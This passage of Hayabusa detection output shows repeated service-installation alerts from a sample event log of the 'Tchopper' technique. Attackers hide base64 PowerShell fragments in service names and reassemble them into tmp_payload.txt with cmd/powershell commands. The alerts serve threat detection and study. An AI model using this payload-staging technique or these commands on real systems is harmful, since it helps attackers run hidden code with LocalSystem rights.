tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
